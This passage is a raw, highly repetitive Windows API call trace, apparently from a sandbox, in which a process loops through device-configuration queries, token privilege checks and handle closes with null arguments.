pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.186] GetLastError () returned 0x578 [0085.186] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.186] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.186] GetCurrentThread () returned 0xfffffffe [0085.186] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.186] GetLastError () returned 0x3f0 [0085.186] GetCurrentProcess () returned 0xffffffff [0085.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.187] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.187] SetLastError (dwErrCode=0x522) [0085.187] CloseHandle (hObject=0x114) returned 1 [0085.187] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.187] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.187] GetLastError () returned 0x578 [0085.187] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.187] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.187] GetCurrentThread () returned 0xfffffffe [0085.187] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.187] GetLastError () returned 0x3f0 [0085.187] GetCurrentProcess () returned 0xffffffff [0085.187] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.187] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.187] SetLastError (dwErrCode=0x522) [0085.187] CloseHandle (hObject=0x114) returned 1 [0085.187] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.187] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.187] GetLastError () returned 0x578 [0085.187] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.187] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.187] GetCurrentThread () returned 0xfffffffe [0085.187] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.187] GetLastError () returned 0x3f0 [0085.187] GetCurrentProcess () returned 0xffffffff [0085.187] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.187] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.187] SetLastError (dwErrCode=0x522) [0085.187] CloseHandle (hObject=0x114) returned 1 [0085.187] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.187] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.187] GetLastError () returned 0x578 [0085.187] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.187] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.187] GetCurrentThread () returned 0xfffffffe [0085.187] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.188] GetLastError () returned 0x3f0 [0085.188] GetCurrentProcess () returned 0xffffffff [0085.188] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.188] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.188] SetLastError (dwErrCode=0x522) [0085.188] CloseHandle (hObject=0x114) returned 1 [0085.188] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.188] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.188] GetLastError () returned 0x578 [0085.188] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.188] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.188] GetCurrentThread () returned 0xfffffffe [0085.188] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.188] GetLastError () returned 0x3f0 [0085.188] GetCurrentProcess () returned 0xffffffff [0085.188] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.188] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.188] SetLastError (dwErrCode=0x522) [0085.188] CloseHandle (hObject=0x114) returned 1 [0085.188] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.188] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.188] GetLastError () returned 0x578 [0085.188] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.188] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.188] GetCurrentThread () returned 0xfffffffe [0085.188] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.189] GetLastError () returned 0x3f0 [0085.189] GetCurrentProcess () returned 0xffffffff [0085.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.189] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.189] SetLastError (dwErrCode=0x522) [0085.189] CloseHandle (hObject=0x114) returned 1 [0085.189] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.189] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.189] GetLastError () returned 0x578 [0085.189] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.189] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.189] GetCurrentThread () returned 0xfffffffe [0085.189] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.189] GetLastError () returned 0x3f0 [0085.189] GetCurrentProcess () returned 0xffffffff [0085.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.189] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.189] SetLastError (dwErrCode=0x522) [0085.189] CloseHandle (hObject=0x114) returned 1 [0085.189] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.189] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.189] GetLastError () returned 0x578 [0085.189] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.189] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.189] GetCurrentThread () returned 0xfffffffe [0085.189] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.189] GetLastError () returned 0x3f0 [0085.189] GetCurrentProcess () returned 0xffffffff [0085.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.189] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.189] SetLastError (dwErrCode=0x522) [0085.189] CloseHandle (hObject=0x114) returned 1 [0085.189] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.189] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.189] GetLastError () returned 0x578 [0085.189] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.189] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.189] GetCurrentThread () returned 0xfffffffe [0085.189] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.190] GetLastError () returned 0x3f0 [0085.190] GetCurrentProcess () returned 0xffffffff [0085.190] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.190] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.190] SetLastError (dwErrCode=0x522) [0085.190] CloseHandle (hObject=0x114) returned 1 [0085.190] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.190] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.190] GetLastError () returned 0x578 [0085.190] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.190] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.190] GetCurrentThread () returned 0xfffffffe [0085.190] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.190] GetLastError () returned 0x3f0 [0085.190] GetCurrentProcess () returned 0xffffffff [0085.190] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.190] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.190] SetLastError (dwErrCode=0x522) [0085.190] CloseHandle (hObject=0x114) returned 1 [0085.190] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.190] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.190] GetLastError () returned 0x578 [0085.190] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.190] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.190] GetCurrentThread () returned 0xfffffffe [0085.190] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.190] GetLastError () returned 0x3f0 [0085.190] GetCurrentProcess () returned 0xffffffff [0085.190] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.190] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.190] SetLastError (dwErrCode=0x522) [0085.190] CloseHandle (hObject=0x114) returned 1 [0085.190] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.190] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.190] GetLastError () returned 0x578 [0085.191] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.191] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.191] GetCurrentThread () returned 0xfffffffe [0085.191] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.191] GetLastError () returned 0x3f0 [0085.191] GetCurrentProcess () returned 0xffffffff [0085.191] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.191] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.191] SetLastError (dwErrCode=0x522) [0085.191] CloseHandle (hObject=0x114) returned 1 [0085.191] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.191] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.191] GetLastError () returned 0x578 [0085.191] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.191] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.191] GetCurrentThread () returned 0xfffffffe [0085.191] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.191] GetLastError () returned 0x3f0 [0085.191] GetCurrentProcess () returned 0xffffffff [0085.191] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.191] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.191] SetLastError (dwErrCode=0x522) [0085.191] CloseHandle (hObject=0x114) returned 1 [0085.191] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.191] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.191] GetLastError () returned 0x578 [0085.191] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.191] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.191] GetCurrentThread () returned 0xfffffffe [0085.191] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.191] GetLastError () returned 0x3f0 [0085.191] GetCurrentProcess () returned 0xffffffff [0085.191] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.191] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.191] SetLastError (dwErrCode=0x522) [0085.191] CloseHandle (hObject=0x114) returned 1 [0085.191] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.192] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.192] GetLastError () returned 0x578 [0085.192] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.192] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.192] GetCurrentThread () returned 0xfffffffe [0085.192] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.192] GetLastError () returned 0x3f0 [0085.192] GetCurrentProcess () returned 0xffffffff [0085.192] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.192] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.192] SetLastError (dwErrCode=0x522) [0085.192] CloseHandle (hObject=0x114) returned 1 [0085.192] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.192] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.192] GetLastError () returned 0x578 [0085.192] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.192] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.192] GetCurrentThread () returned 0xfffffffe [0085.192] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.192] GetLastError () returned 0x3f0 [0085.192] GetCurrentProcess () returned 0xffffffff [0085.192] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.192] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.192] SetLastError (dwErrCode=0x522) [0085.192] CloseHandle (hObject=0x114) returned 1 [0085.192] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.192] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.192] GetLastError () returned 0x578 [0085.192] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.192] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.192] GetCurrentThread () returned 0xfffffffe [0085.192] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.192] GetLastError () returned 0x3f0 [0085.192] GetCurrentProcess () returned 0xffffffff [0085.192] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.192] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.192] SetLastError (dwErrCode=0x522) [0085.192] CloseHandle (hObject=0x114) returned 1 [0085.192] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.193] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.193] GetLastError () returned 0x578 [0085.193] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.193] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.193] GetCurrentThread () returned 0xfffffffe [0085.193] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.193] GetLastError () returned 0x3f0 [0085.193] GetCurrentProcess () returned 0xffffffff [0085.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.193] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.193] SetLastError (dwErrCode=0x522) [0085.193] CloseHandle (hObject=0x114) returned 1 [0085.193] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.193] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.193] GetLastError () returned 0x578 [0085.193] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.193] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.193] GetCurrentThread () returned 0xfffffffe [0085.193] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.193] GetLastError () returned 0x3f0 [0085.193] GetCurrentProcess () returned 0xffffffff [0085.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.193] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.193] SetLastError (dwErrCode=0x522) [0085.193] CloseHandle (hObject=0x114) returned 1 [0085.193] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.193] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.193] GetLastError () returned 0x578 [0085.193] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.193] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.193] GetCurrentThread () returned 0xfffffffe [0085.193] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.193] GetLastError () returned 0x3f0 [0085.193] GetCurrentProcess () returned 0xffffffff [0085.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.193] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.193] SetLastError (dwErrCode=0x522) [0085.193] CloseHandle (hObject=0x114) returned 1 [0085.194] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.194] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.194] GetLastError () returned 0x578 [0085.194] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.194] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.194] GetCurrentThread () returned 0xfffffffe [0085.194] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.194] GetLastError () returned 0x3f0 [0085.194] GetCurrentProcess () returned 0xffffffff [0085.194] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.194] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.194] SetLastError (dwErrCode=0x522) [0085.194] CloseHandle (hObject=0x114) returned 1 [0085.194] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.194] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.194] GetLastError () returned 0x578 [0085.194] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.194] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.194] GetCurrentThread () returned 0xfffffffe [0085.194] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.194] GetLastError () returned 0x3f0 [0085.194] GetCurrentProcess () returned 0xffffffff [0085.194] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.194] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.194] SetLastError (dwErrCode=0x522) [0085.194] CloseHandle (hObject=0x114) returned 1 [0085.194] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.194] CM_Get_Device_Interface_List_SizeA 